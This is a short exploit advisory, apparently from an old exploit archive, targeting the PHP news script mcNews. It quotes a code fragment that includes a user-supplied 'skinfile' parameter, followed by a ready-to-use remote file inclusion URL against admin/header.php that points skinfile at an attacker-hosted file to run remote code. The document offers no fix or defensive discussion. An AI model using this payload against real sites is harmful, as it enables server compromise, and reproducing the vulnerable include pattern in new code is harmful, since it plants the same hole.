------------------------------------------------------------------------
-------------------------------------------
MEFISTO PreSents...

Script: mcNews
Script Download: ftp://ftp1.comscripts.com/PHP/845_mcnews-13.zip
Contact: ilker Kandemir <ilkerkandemir[at]mynet.com>

info:
/* MEFISTO */

------------------------------------------------------------------------
-------------------------------------------
Code:
if($voir!='') {
$skinfile=strstr($skinfile, 'skin');
include ("$skinfile");

------------------------------------------------------------------------
-------------------------------------------
Exploit:

http://[site]/[news_path]/admin/header.php?skinfile=http://attacker.txt?

------------------------------------------------------------------------
-------------------------------------------

Tnx:dumenci,h0tturk,ajann

# MefistoLabs.Com

[ reply ]